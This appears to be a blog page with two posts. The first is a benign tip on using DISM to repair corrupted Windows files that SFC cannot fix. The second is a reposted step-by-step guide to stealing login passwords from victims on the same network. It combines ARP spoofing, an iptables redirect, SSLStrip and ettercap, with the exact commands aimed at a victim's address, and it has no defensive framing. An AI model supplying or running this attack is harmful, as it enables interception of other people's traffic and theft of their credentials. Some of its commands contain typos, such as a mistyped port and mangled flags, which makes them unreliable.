Thought I would share this little gem I just found out about.  I have always used the System File Checker in Windows to detect and (sometimes) repair corrupted system files.  Although, at times, it finds files that it cannot repair.  This is when things get aggravating and I would have to skim over the CBS.log file in order to find what file was corrupt and try to manually replace it.

Today, I came across this issue and decided to do some searching.  I found a command that I had never before been introduced to:
       DISM /Online /Cleanup-Image /RestoreHealth

The Development Image Servicing and Management tool !  With the specified /online switch, it recovers corrupted files for the OS that is currently running.  No more, inserting installation disks and searching for the file or searching through backups.

As you can see in the attached screen shot, my SFC found a corrupt file and was unable to restore it.  I ran the DISM and it recovered the corrupted file.  Another SFC afterwards confirmed, no more corrupted system files.

I hope that this helps and excites some of you like  it did me.  For those of you who already knew about it… don’t rub it in!

Have a wonderful Weekend!

33 total views, no views today

From: http://jkook.blogspot.com/2009/09/sslstrip-step-by-step-on-ubuntu.html


 

SSLStrip used along with MITM to hack SSL websites.
You will need following tools

  1. SSLStrip
  2. arpspoof
  3. ettercap
  4. Ubuntu Linux
  5. Internet Connection
  6. Victim has to be in the same subnet

Step 1:- Download SSLStrip from http://www.thoughtcrime.org/software/sslstrip/

Step 2:- Unzip the downloaded files use “tar -zxvf sslstrip-0.4.tar.gz”


Step 3:- Build SSLStrip change directory to unzip folder run “python setup.py build”

Step 4:- Install SSLStrip run “sudo python setup.py install” , Requires root privilages

Step 5:- Install arpspoof “sudo apt-get install dsniff”

Step 6:- Install ettercap “sudo apt-get install ettercap”


Step 7:- Verify you ipaddress “ifconfig” Notice the hackers ip is 172.168.1.3


Step 8:- Verify your default gateway “ip route show | grep default | awk ‘{ print $3}’ “

Note : This hack works only if victims gateway address is same as that of the Hacker. (172.168.1.1 in the above example)

Step 9:- Create three different tabs in your terminal window. We need to run three commands parallely. In first tab run ” sudo arpspoof -t 172.168.1.4 172.168.1.1″


Step 10:- Second tab run “iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1000″
and run “sslstrip”


Step 11:- In the thisd tab run ettercap. Ethercap will print all the password it sniffed on the console. “sudo ettercap -Tqz”

Step 12:- Wait for the victim to login to gmail , yahoo etc.. the passwords will be printed on ettercap console.

28 total views, no views today